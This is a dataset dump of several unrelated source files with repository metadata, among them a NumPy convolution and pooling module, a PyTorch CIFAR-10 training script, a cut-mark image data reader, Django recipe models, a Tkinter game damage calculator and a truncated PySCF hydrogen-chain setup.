| null | null | null | null |
UTF-8
|
Python
| false
| false
| 14,773
|
py
|
###################################################################################################
# Copyright (C) 2018-2020 Maxim Integrated Products, Inc. All Rights Reserved.
#
# Maxim Integrated Products, Inc. Default Copyright Notice:
# https://www.maximintegrated.com/en/aboutus/legal/copyrights.html
#
# Written by RM
###################################################################################################
"""
Pure Python implementation of Conv1d, Conv2d, ConvTranspose2d, Pool1d, Pool2d, Eltwise, and Linear.
Allows debug of individual accumulations.
NumPy implementation of Conv2d, ConvTranspose2d, Pool2d.
Compatible with PyTorch.
"""
import os
import sys
import numpy as np
from numpy.lib.stride_tricks import as_strided
import op
import stats
from eprint import eprint
"""
Comment for git change tweak
"""
debug_log = None
def debug_open(
layer,
base_directory,
test_name,
log_filename, # pylint: disable=unused-argument
):
"""
Create debug log for a layer
"""
global debug_log # pylint: disable=global-statement
debug_log = open(os.path.join(base_directory, test_name,
f'compute-{layer}.csv'), 'w')
def debug_print(
t,
):
"""
Print to the compute debug log
"""
global debug_log # pylint: disable=global-statement
print(t, file=debug_log)
def debug_close():
"""
Close the compute debug log
"""
global debug_log # pylint: disable=global-statement
debug_log.close()
def conv2d(
data,
weight,
bias,
input_size,
output_size,
kernel_size,
stride,
pad,
dilation,
fractional_stride,
output_pad,
groups=1,
debug=False,
):
"""
Compute a 2D convolution.
Note that all PyTorch numbers are ordered (C, H, W)
"""
assert data.shape == tuple(input_size)
in_channels = input_size[0]
out_channels = output_size[0]
if debug:
# Slow route using pure Python
ref = np.full(shape=output_size, fill_value=np.nan, dtype=np.int64)
debug_print('k,c,x,y,weight,data,prod,cacc,acc')
for k in range(out_channels):
for y in range(-pad[0],
input_size[1] - dilation[0] * (kernel_size[0] - 1) + pad[0],
stride[0]):
for y_frac in range(fractional_stride[0]):
for x in range(-pad[1],
input_size[2] - dilation[1] * (kernel_size[1] - 1) + pad[1],
stride[1]):
for x_frac in range(fractional_stride[1]):
val = np.int64(0)
c = 0
while True:
dc = c if groups == 1 else c + k * (in_channels // groups)
                                sval = np.int64(0)
for h in range(kernel_size[0]):
for w in range(kernel_size[1]):
ypos = (y + pad[0])*fractional_stride[0] - pad[0] \
+ y_frac + h * dilation[0]
yd, yr = divmod(ypos, fractional_stride[0])
xpos = (x + pad[1])*fractional_stride[1] - pad[1] \
+ x_frac + w * dilation[1]
xd, xr = divmod(xpos, fractional_stride[1])
if yr == 0 and 0 <= yd < input_size[1] and \
xr == 0 and 0 <= xd < input_size[2]:
prod = weight[k][c][h][w] * data[dc][yd][xd]
sval += prod
val += prod
stats.true_macc += 1
debug_print(
f'{k},{c},{x},{y},{weight[k][c][h][w]},'
f'{data[dc][yd][xd]},{prod},{sval},{val}'
)
c += 16
if c >= in_channels // groups:
c = (c + 1) % 16
if c in (0, in_channels // groups):
break
if bias is not None:
val += bias[k]
debug_print(
f' adding bias: {bias[k]} -> result: {val}'
)
ref[k][
((y + pad[0])*fractional_stride[0] + y_frac) // stride[0]
][
((x + pad[1])*fractional_stride[1] + x_frac) // stride[1]
] = val
# Fast computation using NumPy
# Stretch data for fractionally-strided convolution
if fractional_stride[0] > 1 or fractional_stride[1] > 1:
ndata = np.zeros((data.shape[0],
data.shape[1] * fractional_stride[0],
data.shape[2] * fractional_stride[1]),
dtype=data.dtype)
ndata[:, 0::fractional_stride[0], 0::fractional_stride[1]] = data
data = ndata
# Create zero padding around data and stretch weights for dilation.
if pad[0] or pad[1] or output_pad[0] or output_pad[1]:
data = np.pad(data, pad_width=((0, 0),
(pad[0], pad[0]),
(pad[1], pad[1])),
mode='constant', constant_values=0)
if dilation[0] > 1 or dilation[1] > 1:
nweight = np.zeros((weight.shape[0], weight.shape[1],
(kernel_size[0] - 1) * dilation[0] + 1,
(kernel_size[1] - 1) * dilation[1] + 1),
dtype=weight.dtype)
nweight[:, :, 0::dilation[0], 0::dilation[1]] = weight
weight = nweight
    h = (data.shape[1] - weight.shape[2] + 1) // stride[0]  # Resulting output height
    w = (data.shape[2] - weight.shape[3] + 1) // stride[1]  # Resulting output width
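    # as_strided builds a zero-copy 5-D view (out_y, out_x, C, kh, kw) of every
    # sliding window; the tensordot below contracts (C, kh, kw) against the
    # weights to produce all output pixels at once.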
view = as_strided(data,
shape=(h, w, data.shape[0], weight.shape[2], weight.shape[3]),
strides=((data.strides[1] * stride[0], data.strides[2] * stride[1],
data.strides[0], data.strides[1], data.strides[2])),
writeable=False)
if groups > 1:
nweight = np.zeros((weight.shape[0], in_channels, weight.shape[2], weight.shape[3]),
dtype=weight.dtype)
for i in range(weight.shape[0]):
for j in range(in_channels // groups):
nweight[i, i * (in_channels // groups) + j, :, :] = weight[i, j, :, :]
weight = nweight
output = np.tensordot(view, weight, axes=((2, 3, 4), (1, 2, 3))).transpose(2, 0, 1)
# Apply bias
if bias is not None:
for k in range(out_channels):
output[k] += bias[k]
if debug:
if not (ref == output).all():
eprint('NumPy <-> Python mismatch in compute.conv2d')
sys.exit(1)
assert output.shape == tuple(output_size)
return output
def conv1d(
data,
weight,
bias,
input_size,
output_size,
out_channels,
kernel_size,
stride,
pad,
dilation,
groups=1,
debug=False,
):
"""
Compute a 1D convolution.
Note that all PyTorch numbers are ordered (C, L)
"""
in_channels = input_size[0]
weight = weight.reshape(out_channels, input_size[0] // groups, -1)
data = data.reshape(input_size[0], -1)
output = np.full(shape=(output_size[0], output_size[1]),
fill_value=np.nan, dtype=np.int64)
# Compute 1D convolution
if debug:
debug_print('k,c,x,src_offs,wt_offs,weight,data,acc')
for k in range(out_channels):
out_offs = 0
for x in range(-pad, input_size[1] - dilation * (kernel_size - 1) + pad, stride):
val = np.int64(0)
for c in range(in_channels // groups):
dc = c if groups == 1 else c + k * (in_channels // groups)
for w in range(kernel_size):
src_offs = x + w * dilation
if 0 <= src_offs < input_size[1]:
val += weight[k][c][w] * data[dc][src_offs]
stats.true_macc += 1
if debug:
debug_print(
f'{k},{c},{x},{src_offs},{w},{weight[k][c][w]},'
f'{data[dc][src_offs]},{val}'
)
if bias is not None:
val += bias[k]
if debug:
debug_print(
f'+bias {bias[k]} --> output[{k}][{out_offs}] = {val}',
)
output[k][out_offs] = val
out_offs += 1
return output.reshape((output_size))
def linear(
data,
weight,
bias,
in_features,
out_features,
debug=False,
):
"""
Compute a fully connected layer.
"""
output = np.empty(out_features, dtype=np.int64)
for w in range(out_features):
val = np.int64(0)
for n in range(in_features):
val += data[n] * weight[w][n]
stats.true_sw_macc += 1
if debug:
debug_print(
f'w={w}, n={n}, weight={weight[w][n]}, data={data[n]} '
f'-> accumulator = {val} '
)
if bias is not None:
val += bias[w]
if debug:
debug_print(f'+bias {bias[w]} --> output[{w}] = {val}')
output[w] = val
return output
def pool2d(
data,
input_size,
output_size,
pool,
stride,
average,
floor=True,
debug=False,
):
"""
Compute 2D Pooling (Average or Max)
"""
assert data.shape == tuple(input_size)
if debug:
# Slow using pure Python
ref = np.empty(shape=output_size, dtype=np.int64)
for c in range(input_size[0]):
for row in range(0, output_size[1]*stride[0], stride[0]):
for col in range(0, output_size[2]*stride[1], stride[1]):
if average:
avg = np.average(data[c][row:row+pool[0], col:col+pool[1]])
if floor:
if avg < 0:
val = np.ceil(avg).astype(np.int64).clip(min=-128, max=127)
else:
val = np.floor(avg).astype(np.int64).clip(min=-128, max=127)
else:
val = np.floor(avg + 0.5).astype(np.int64).clip(min=-128, max=127)
else:
val = np.amax(data[c][row:row+pool[0], col:col+pool[1]])
ref[c][row//stride[0]][col//stride[1]] = val
# Fast computation using NumPy
data_pad = data[:, :(data.shape[1] - pool[0]) // stride[0] * stride[0] + pool[0],
:(data.shape[2] - pool[1]) // stride[1] * stride[1] + pool[1], ...]
h, w = data_pad.strides[1:]
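    # Non-copying sliding-window view of shape (C, out_h, out_w, pool_h, pool_w);
    # the mean/max reductions below collapse the two trailing window axes.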
view = as_strided(data_pad,
shape=(data_pad.shape[0],
1 + (data_pad.shape[1]-pool[0]) // stride[0],
1 + (data_pad.shape[2]-pool[1]) // stride[1],
pool[0], pool[1]),
strides=(data_pad.strides[0], stride[0] * h, stride[1] * w, h, w),
writeable=False)
if average:
if floor:
pooled = np.nanmean(view, dtype=np.int64, axis=(3, 4))
else:
pooled = np.round(np.nanmean(view, axis=(3, 4))).astype(np.int64)
else:
pooled = np.nanmax(view, axis=(3, 4))
if debug:
match = (ref == pooled).all()
if not match:
eprint('NumPy <-> Python mismatch in compute.pool2d')
sys.exit(1)
assert pooled.shape == tuple(output_size)
return pooled
def pool1d(
data,
input_size,
output_size,
pool,
stride,
average,
floor=True,
debug=False,
): # pylint: disable=unused-argument
"""
Compute 1D Pooling (Average or Max)
"""
assert data.shape == tuple(input_size)
pooled = np.empty(shape=output_size, dtype=np.int64)
for c in range(input_size[0]):
for x in range(0, output_size[1]*stride, stride):
if average:
avg = np.average(data[c][x:x+pool])
if avg < 0:
val = np.ceil(avg).astype(np.int64).clip(min=-128, max=127)
else:
val = np.floor(avg).astype(np.int64).clip(min=-128, max=127)
else:
val = np.amax(data[c][x:x+pool])
pooled[c][x//stride] = val
return pooled
def eltwise(
operator,
data,
input_size,
debug=False,
): # pylint: disable=unused-argument
"""
Compute element-wise operation.
"""
assert data[0].shape == tuple(input_size)
operands = len(data)
output = data[0]
for i in range(1, operands):
if operator == op.ELTWISE_ADD:
output = np.add(output, data[i])
elif operator == op.ELTWISE_MUL:
output = np.multiply(output, data[i])
elif operator == op.ELTWISE_OR:
output = np.bitwise_or(output, data[i])
elif operator == op.ELTWISE_SUB:
output = np.subtract(output, data[i])
elif operator == op.ELTWISE_XOR:
output = np.bitwise_xor(output, data[i])
else:
print(f"Unknown operator `{op.string(operator)}`")
raise NotImplementedError
assert output.shape == tuple(input_size)
return output
|
[
"jeremy.kongs@maximintegrated.com"
] |
jeremy.kongs@maximintegrated.com
|
78577dda9d4141161071de69b743051cb5579cd6
|
2b5f2a19e3ba345faef6bffac322035b62858a00
|
/pancakeSorting.py
|
086e3a7bbd00137be6589ebc3125941b245a2800
|
[] |
no_license
|
QuiveryNinja/pancakeAlgorithm
|
9416478ed1fc479462d7beb03d31ff3cbb874b47
|
810ebc9d57e62b6bafc8bda508eea4dc26bde7ef
|
refs/heads/master
| 2022-12-23T16:31:20.040630
| 2020-09-30T17:26:45
| 2020-09-30T17:26:45
| 299,996,370
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 219
|
py
|
pancakes = [2,3,1,7,4,0,5]
plate = []
def SortPancakes():
    # sort ascending, then move every pancake onto the plate largest-first
    pancakes.sort()
    while pancakes:
        plate.append(pancakes.pop())
    return plate
print(SortPancakes())
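# For the list above this prints [7, 5, 4, 3, 2, 1, 0]: the plate receives the
# pancakes largest-first.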
|
[
"noreply@github.com"
] |
QuiveryNinja.noreply@github.com
|
deb9a9a5bcbcf81070b70cbacf9f9c173d2f9875
|
1309ac4b1f497886010345fd41a14da469bf8780
|
/VaretyrSpearSimulation.py
|
3e5ae0a2418cbc6d4ea7e86963aba9ed71b68d65
|
[] |
no_license
|
sugky7302/Varetyr-Spear-Simulation
|
d851a69c283e42da211ffb021747c9aebf15076e
|
8ddc47c102beabf29e8c6674023058a16250822d
|
refs/heads/master
| 2020-03-26T04:57:06.312200
| 2018-08-13T08:00:05
| 2018-08-13T08:00:05
| 144,530,402
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,040
|
py
|
from tkinter import *
from tkinter import ttk
from tkinter import scrolledtext
_VERSION = '0.1.0'
# Create the main window
window = Tk()
window.title("聖槍刺擊 " + _VERSION)
class NewEntry:
def __init__ (self, labelText, column, row):
self.newObject = {}
self.newObject['label'] = ttk.Label(window, text = labelText)
self.newObject['label'].grid(column = column, row = row)
self.newObject['value'] = StringVar()
self.newObject['entry'] = ttk.Entry(window, width = 4, textvariable = self.newObject['value'])
self.newObject['entry'].grid(column = column + 1, row = row)
def get (self):
return int(self.newObject['value'].get())
# Row 1: base stats
strength = NewEntry("STR:", 0, 0)
intelligence = NewEntry("INT:", 2, 0)
# Row 2: stat ATK + refinement ATK
baseAtk = NewEntry("素質ATK:", 0, 1)
repairAtk = NewEntry("修鍊ATK:", 2, 1)
# Row 3: weapon
weaponAtk = NewEntry("武器ATK:", 0, 2)
weaponLevel = NewEntry("武器等級:", 2, 2)
intensify = NewEntry("武器精鍊值:", 4, 2)
# Rows 4-5: ATK bonus effects
itemAtk = NewEntry("卡裝ATK:", 0, 3)
classAtk = NewEntry("階級&atk(%):", 2, 3)
raceAtk = NewEntry("種族(%):", 0, 4)
enemyAttribute = NewEntry("敵方屬性(%):", 2, 4)
# Row 6: stat MATK + weapon MATK
baseMatk = NewEntry("素質MATK:", 0, 5)
weaponMatk = NewEntry("武器MATK:", 2, 5)
# Row 7: weapon MATK + card/equipment ATK
itemMatk = NewEntry("卡裝MATK:", 0, 6)
# Rows 8-9: MATK bonus effects
enchant = NewEntry("卡裝&附魔(%):", 0, 7)
raceMatk = NewEntry("種族&針對魔物(%):", 2, 7)
enemyAttributeForMagic = NewEntry("敵方屬性(%):", 0, 8)
myAttributeForMagic = NewEntry("自身屬性(%):", 2, 8)
# Row 10: skill damage bonus
skill = NewEntry("技能(%):", 0, 9)
# Row 11: calculation result
def CalculateDamage ():
firstAtk = repairAtk.get() + baseAtk.get() * 2
secondAtk = weaponAtk.get() * (1 + strength.get() * 0.005 + weaponLevel.get() * 0.05) + 5 * intensify.get() + 8 * (intensify.get() + weaponLevel.get() - 8) + 18 * weaponLevel.get() + itemAtk.get()
secondAtkBuff = (1 + classAtk.get() / 100) * (1 + raceAtk.get() / 100) * (1 + enemyAttribute.get() / 100)
secondMatk = (weaponMatk.get() + 5 * intensify.get()) * (1 + 0.1 * weaponLevel.get()) + 8 * (intensify.get() + weaponLevel.get() - 8)
secondMatkBuff = (1 + enchant.get() / 100) * (1 + raceMatk.get() / 100) * (1 + enemyAttributeForMagic.get() / 100) * (1 + myAttributeForMagic.get() / 100)
return ((firstAtk + secondAtk * secondAtkBuff) * 8.75 + 4 * secondMatk * secondMatkBuff * ((5 * intelligence.get() / 100 + 2.5) * 1.75 + 1.8)) * (1 + skill.get() / 100)
def CalculateAction():
damage = str(CalculateDamage())
calculationLabel.config(text = damage)
calculation = ttk.Button(window, text = "計算", command = CalculateAction)
calculation.grid(column = 3, row = 10)
calculationLabel = ttk.Label(window, text = "")
calculationLabel.grid(column = 1, row = 10)
# Show the main window
window.mainloop()
|
[
"sugky7302@gmail.com"
] |
sugky7302@gmail.com
|
b0b53b387467c7290b49d7c01a16691b782d9100
|
951b605ea41da28dccba6d3de63fb9211b7ad5b1
|
/Mains/main.py
|
f3cabc1b8e650a5af81217b1b118a57e8a7327f4
|
[
"MIT"
] |
permissive
|
tiangeluo/DefectiveCNN
|
99296f7a86efd3c4d044701f4e94388989cbd66a
|
fdbf5235adffa846630fadb4ff910de50870c077
|
refs/heads/master
| 2022-01-29T14:23:10.198712
| 2022-01-08T22:20:54
| 2022-01-08T22:20:54
| 222,830,775
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,648
|
py
|
'''Train CIFAR10 with PyTorch.'''
from __future__ import print_function
import torch
import torch.nn as nn
import torch.optim as optim
import torch.nn.functional as F
import torch.backends.cudnn as cudnn
import torchvision
import torchvision.transforms as transforms
import os
import argparse
#from models import *
from resnet import ResNet18
#from resnet_drop import ResNet18
from utils import progress_bar
from torch.optim.lr_scheduler import MultiStepLR
parser = argparse.ArgumentParser(description='PyTorch CIFAR10 Training')
parser.add_argument('--lr', default=0.1, type=float, help='learning rate')
parser.add_argument('--resume', '-r', action='store_true', help='resume from checkpoint')
args = parser.parse_args()
device = 'cuda' if torch.cuda.is_available() else 'cpu'
best_acc = 0 # best test accuracy
start_epoch = 0 # start from epoch 0 or last checkpoint epoch
# Data
print('==> Preparing data..')
transform_train = transforms.Compose([
transforms.RandomCrop(32, padding=4),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),
])
transform_test = transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),
])
trainset = torchvision.datasets.CIFAR10(root='./data', train=True, download=True, transform=transform_train)
trainloader = torch.utils.data.DataLoader(trainset, batch_size=128, shuffle=True, num_workers=2)
testset = torchvision.datasets.CIFAR10(root='./data', train=False, download=True, transform=transform_test)
testloader = torch.utils.data.DataLoader(testset, batch_size=128, shuffle=False, num_workers=2)
classes = ('plane', 'car', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck')
# Model
print('==> Building model..')
#net = VGG('VGG19')
#net = ResNet18()
# net = PreActResNet18()
#net = GoogLeNet()
#net = DenseNet121()
#net = ResNet50()
#net = ResNeXt29_2x64d()
# net = MobileNet()
#net = MobileNetV2()
#net = DPN92()
# net = ShuffleNetG2()
#net = SENet18()
net = ResNet18()
net = net.to(device)
if device == 'cuda':
net = torch.nn.DataParallel(net)
cudnn.benchmark = True
if args.resume:
# Load checkpoint.
print('==> Resuming from checkpoint..')
assert os.path.isdir('checkpoint'), 'Error: no checkpoint directory found!'
checkpoint = torch.load('./checkpoint/ckpt.t7')
net.load_state_dict(checkpoint['net'])
best_acc = checkpoint['acc']
start_epoch = checkpoint['epoch']
criterion = nn.CrossEntropyLoss()
optimizer = optim.SGD(net.parameters(), lr=args.lr, momentum=0.9, weight_decay=5e-4)
scheduler = MultiStepLR(optimizer, milestones=[150,250], gamma=0.1)
# Training
def train(epoch):
scheduler.step()
print('\nEpoch: %d' % epoch)
net.train()
train_loss = 0
correct = 0
total = 0
for batch_idx, (inputs, targets) in enumerate(trainloader):
inputs, targets = inputs.to(device), targets.to(device)
optimizer.zero_grad()
outputs = net(inputs)
loss = criterion(outputs, targets)
loss.backward()
optimizer.step()
train_loss += loss.item()
_, predicted = outputs.max(1)
total += targets.size(0)
correct += predicted.eq(targets).sum().item()
progress_bar(batch_idx, len(trainloader), 'Loss: %.3f | Acc: %.3f%% (%d/%d)'
% (train_loss/(batch_idx+1), 100.*correct/total, correct, total))
def test(epoch):
global best_acc
net.eval()
test_loss = 0
correct = 0
total = 0
with torch.no_grad():
for batch_idx, (inputs, targets) in enumerate(testloader):
inputs, targets = inputs.to(device), targets.to(device)
outputs = net(inputs)
loss = criterion(outputs, targets)
test_loss += loss.item()
_, predicted = outputs.max(1)
total += targets.size(0)
correct += predicted.eq(targets).sum().item()
progress_bar(batch_idx, len(testloader), 'Loss: %.3f | Acc: %.3f%% (%d/%d)'
% (test_loss/(batch_idx+1), 100.*correct/total, correct, total))
# Save checkpoint.
acc = 100.*correct/total
if acc > best_acc:
print('Saving..')
state = {
'net': net.state_dict(),
'acc': acc,
'epoch': epoch,
}
if not os.path.isdir('checkpoint'):
os.mkdir('checkpoint')
        torch.save(state, './checkpoint/ckpt.t7')  # same path that --resume loads
best_acc = acc
for epoch in range(start_epoch, start_epoch+350):
train(epoch)
if epoch % 5 == 0:
test(epoch)
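# Typical invocation (assumed, not documented in the original):
#   python main.py --lr 0.1          # train from scratch
#   python main.py --lr 0.1 --resume # continue from ./checkpoint/ckpt.t7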
|
[
"tiangelce@gmail.com"
] |
tiangelce@gmail.com
|
e734127d3b880b7bdbc64335eccdd72f30d56e81
|
6b9ccdfb8a4d562f0b5122ef954ad76cb038b5d2
|
/CNN/data_reader.py
|
d10dd8cef8a86768a76ccc71ea5e05e652a68e31
|
[] |
no_license
|
yFiLES/cut-marks-classification
|
6d10e4a66c2b7302ef6eddffd2b635def9bfea82
|
6110647d38418cd07042a9f8533e9543a2f35f6e
|
refs/heads/master
| 2022-05-31T20:05:47.768543
| 2019-03-11T17:36:19
| 2019-03-11T17:36:19
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,581
|
py
|
#!/usr/bin/env python
# author: Wonmin Byeon (wonmin.byeon@gmail.com)
# data reader
import scipy.misc
import numpy as np
import glob
import random
import cv2
import sys  # used by the error paths in reading_data()/reading_test_data()
__author__ = "Wonmin Byeon"
__maintainer__ = "Wonmin Byeon"
__email__ = "wonmin.byeon@gmail.com"
np.random.seed(1234)
WORK_DIRECTORY = 'data/'
NUM_TEST_TM, NUM_TEST_RCM, NUM_TEST_CM = 10, 8, 2
IMAGE_SIZE_W, IMAGE_SIZE_H = 180, 520
def resize_image(image):
return scipy.misc.imresize(image, (IMAGE_SIZE_H, IMAGE_SIZE_W))
def resize_images(data, n_data):
resized_data = []
    for idx in range(n_data):
image = data[idx]
resized_data.append(resize_image(image))
print("resized_data shape", np.array(resized_data).shape)
return resized_data
def apply_clahe(image):
clahe = cv2.createCLAHE(clipLimit=2.0, tileGridSize=(8,8))
return clahe.apply(image).reshape(IMAGE_SIZE_H, IMAGE_SIZE_W, 1)
def apply_histogrameq(image):
processed = cv2.equalizeHist(image).reshape(IMAGE_SIZE_H, IMAGE_SIZE_W, 1)
return processed
def normalization(train_data, test_data):
print("before norm", np.mean(train_data), np.std(train_data), np.mean(test_data), np.std(test_data))
mean, std = np.mean(train_data), np.std(train_data)
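    # statistics come from the training split only, so no test-set information
    # leaks into the preprocessing of either split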
train_data -= mean # zero-center
test_data -= mean
train_data /= std
test_data /= std
print("after norm", np.mean(train_data), np.std(train_data), np.mean(test_data), np.std(test_data))
return train_data, test_data
def reading_data():
# Get the data.
try:
flist_tm, flist_rcm, flist_cm = glob.glob(WORK_DIRECTORY+"tm/*.jpg"), glob.glob(WORK_DIRECTORY+"rcm/*.jpg"), glob.glob(WORK_DIRECTORY+"cm/*.jpg")
print('num files tm/rcm/cm: ',len(flist_tm), len(flist_rcm), len(flist_cm))
except:
print('Please set the correct path to the dataset: '+WORK_DIRECTORY+'*.jpg',)
sys.exit()
flist_tm, flist_rcm, flist_cm = shuffling(flist_tm), shuffling(flist_rcm), shuffling(flist_cm)
    min_w, min_h = 99999, 99999
    max_w, max_h = 0, 0
train_data, test_data, train_labels, test_labels, train_fname, test_fname = [], [], [], [], [], []
count = 0
for idx, fname in enumerate(flist_tm):
if ".jpg" in fname:
# image = misc.imread(fname)
image = scipy.misc.imread(fname)
hh, ww = image.shape
image = resize_image(image).reshape(IMAGE_SIZE_H, IMAGE_SIZE_W, 1)
processed1 = apply_histogrameq(image)
image = np.concatenate([image, processed1], axis=2)
if count < NUM_TEST_TM:
test_data.append(image/255.)
test_labels.append(0)
test_fname.append(fname)
count += 1
else:
train_data.append(image/255.)
train_labels.append(0)
train_fname.append(fname)
min_w, min_h = np.amin([min_w, ww]), np.amin([min_h, hh])
            max_w, max_h = np.amax([max_w, ww]), np.amax([max_h, hh])
count=0
for idx, fname in enumerate(flist_rcm):
if ".jpg" in fname:
image = scipy.misc.imread(fname)
hh, ww = image.shape
image = resize_image(image).reshape(IMAGE_SIZE_H, IMAGE_SIZE_W, 1)
processed1 = apply_histogrameq(image)
# processed2 = apply_clahe(image)
image = np.concatenate([image, processed1], axis=2)
if count < NUM_TEST_RCM:
test_data.append(image/255.)
test_labels.append(1)
test_fname.append(fname)
count += 1
else:
train_data.append(image/255.)
train_labels.append(1)
train_fname.append(fname)
min_w, min_h = np.amin([min_w, ww]), np.amin([min_h, hh])
            max_w, max_h = np.amax([max_w, ww]), np.amax([max_h, hh])
count=0
for idx, fname in enumerate(flist_cm):
if ".jpg" in fname:
image = scipy.misc.imread(fname)
hh, ww = image.shape
image = resize_image(image).reshape(IMAGE_SIZE_H, IMAGE_SIZE_W, 1)
processed1 = apply_histogrameq(image)
# processed2 = apply_clahe(image)
image = np.concatenate([image, processed1], axis=2)
if count < NUM_TEST_CM:
test_data.append(image/255.)
test_labels.append(1)
test_fname.append(fname)
count += 1
else:
train_data.append(image/255.)
train_labels.append(1)
train_fname.append(fname)
min_w, min_h = np.amin([min_w, ww]), np.amin([min_h, hh])
            max_w, max_h = np.amax([max_w, ww]), np.amax([max_h, hh])
train_data, train_labels, train_fname = shuffling_dataset(train_data, train_labels, train_fname)
test_data, test_labels, test_fname = shuffling_dataset(test_data, test_labels, test_fname)
train_data, test_data = np.float32(train_data), np.float32(test_data)
train_labels, test_labels = np.int64(train_labels), np.int64(test_labels)
return train_data, test_data, train_labels, test_labels, train_fname, test_fname, min_h, min_w
def reading_test_data(directory):
# Get the data.
try:
flist_tm, flist_cm = glob.glob(directory+"tm/*.jpg"), glob.glob(directory+"cm/*.jpg")
except:
print('Please set the correct path to the dataset: '+directory+'*.jpg',)
sys.exit()
flist_tm, flist_cm = shuffling(flist_tm), shuffling(flist_cm)
test_labels, test_data, test_fname = [], [], []
count = 0
for idx, fname in enumerate(flist_tm):
if ".jpg" in fname:
image = scipy.misc.imread(fname)
hh, ww = image.shape
image = resize_image(image).reshape(IMAGE_SIZE_H, IMAGE_SIZE_W, 1)
processed1 = apply_histogrameq(image)
image = np.concatenate([image, processed1], axis=2)
test_data.append(image/255.)
test_labels.append(0)
test_fname.append(fname)
count += 1
count=0
for idx, fname in enumerate(flist_cm):
if ".jpg" in fname:
image = scipy.misc.imread(fname)
hh, ww = image.shape
image = resize_image(image).reshape(IMAGE_SIZE_H, IMAGE_SIZE_W, 1)
processed1 = apply_histogrameq(image)
image = np.concatenate([image, processed1], axis=2)
test_data.append(image/255.)
test_labels.append(1)
test_fname.append(fname)
count += 1
test_data, test_labels, test_fname = shuffling_dataset(test_data, test_labels, test_fname)
test_data = np.float32(test_data)
test_labels = np.int64(test_labels)
return test_data, test_labels, test_fname
def shuffling(data):
perm = np.arange(len(data))
np.random.shuffle(perm)
data = np.array(data)
return data[perm]
def shuffling_dataset(data, labels, fname):
perm = np.arange(len(data))
np.random.shuffle(perm)
data = np.array(data)
labels = np.array(labels)
fname = np.array(fname)
return data[perm], labels[perm], fname[perm]
|
[
"wonmin.byeon@gmail.com"
] |
wonmin.byeon@gmail.com
|
c379e124c4ff17be1f63b28b14af4a7ae7cddbc6
|
42756a590390ea219b828a0d504b19705a22cd99
|
/app/core/models.py
|
e2247dc93d6c43a4132d8f4c435d0a6aee531868
|
[
"MIT"
] |
permissive
|
namjo/recipe-app-api
|
d68fecec91f8f1cab3b8c14da5663e438eb49888
|
0eb8f1f51e8bc3cf010dd36e55a861ddd1b4cb23
|
refs/heads/master
| 2022-04-26T06:17:45.195474
| 2020-04-24T19:11:40
| 2020-04-24T19:11:40
| 256,265,354
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,600
|
py
|
import uuid
import os
from django.db import models
from django.contrib.auth.models import AbstractBaseUser, BaseUserManager, \
PermissionsMixin
from django.conf import settings
def recipe_image_file_path(instance, filename):
"""Generate file path for new recipe image"""
ext = filename.split('.')[-1]
filename = f'{uuid.uuid4()}.{ext}'
return os.path.join('uploads/recipe/', filename)
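# e.g. (hypothetical UUID): 'uploads/recipe/16fd2706-8baf-433b-82eb-8c7fada847da.jpg'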
class UserManager(BaseUserManager):
def create_user(self, email, password, **extra_fields):
"""Creates and saves a new user"""
if not email:
raise ValueError('Users must have an email address')
user = self.model(email=self.normalize_email(email), **extra_fields)
user.set_password(password)
user.save(using=self._db)
return user
def create_superuser(self, email, password):
"""Creates and saves a new superuser"""
user = self.create_user(email, password)
user.is_staff = True
user.is_superuser = True
user.save(using=self._db)
return user
class User(AbstractBaseUser, PermissionsMixin):
"""Custom user model that supports using email instead of username"""
email = models.EmailField(max_length=255, unique=True)
name = models.CharField(max_length=255)
is_active = models.BooleanField(default=True)
is_staff = models.BooleanField(default=False)
objects = UserManager()
USERNAME_FIELD = 'email'
class Tag(models.Model):
"""Tag to be used for a recipe"""
name = models.CharField(max_length=255)
user = models.ForeignKey(
settings.AUTH_USER_MODEL,
on_delete=models.CASCADE
)
def __str__(self):
return self.name
class Ingredient(models.Model):
"""Ingredient for a recipe"""
name = models.CharField(max_length=255)
user = models.ForeignKey(
settings.AUTH_USER_MODEL,
on_delete=models.CASCADE
)
def __str__(self):
return self.name
class Recipe(models.Model):
"""Recipe object"""
user = models.ForeignKey(
settings.AUTH_USER_MODEL,
on_delete=models.CASCADE
)
title = models.CharField(max_length=255)
time_minutes = models.IntegerField()
price = models.DecimalField(max_digits=5, decimal_places=2)
link = models.CharField(max_length=255, blank=True)
ingredients = models.ManyToManyField('Ingredient')
tags = models.ManyToManyField('Tag')
image = models.ImageField(null=True, upload_to=recipe_image_file_path)
def __str__(self):
return self.title
|
[
"nam.johannes@gmail.com"
] |
nam.johannes@gmail.com
|
33f1b6e48e0c04a001cd1121b0aba0c6b0d1546a
|
6d5510693f65f079e7ff672e064a81e4ff74ca2d
|
/H10_DMRG_curve.py
|
9c3ee350183b1caa05e84df94a967fbdbf364fad
|
[] |
no_license
|
gkc1000/SimonsExercises
|
3612a1f78506ec86e97f30fdd04f197ecc4a6c0b
|
0d4a7d9e4f29b0cd3594ae60957e8304693e8db8
|
refs/heads/master
| 2021-01-20T18:28:32.328247
| 2016-06-23T20:00:11
| 2016-06-23T20:00:11
| 61,827,692
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,050
|
py
|
#!/usr/bin/env python
#
# Author: Qiming Sun <osirpt.sun@gmail.com>
#
from pyscf import gto
from pyscf import scf
from pyscf import mcscf
from pyscf import dmrgscf
import os
from pyscf.dmrgscf import settings
'''
Use DMRG program as the solver
The DMRG program is invoked through system call.
'''
r = 0.7  # H-H spacing used in the geometry below
mol = gto.M( verbose = 4,
atom = [['H', (0, 0, 0)],
['H', (r, 0, 0)],
['H', (2*r, 0, 0)],
['H', (3*r, 0, 0)],
['H', (4*r, 0, 0)],
['H', (5*r, 0, 0)],
['H', (6*r, 0, 0)],
['H', (7*r, 0, 0)],
['H', (8*r, 0, 0)],
['H', (9*r, 0, 0)]],
basis = 'sto-3g',
)
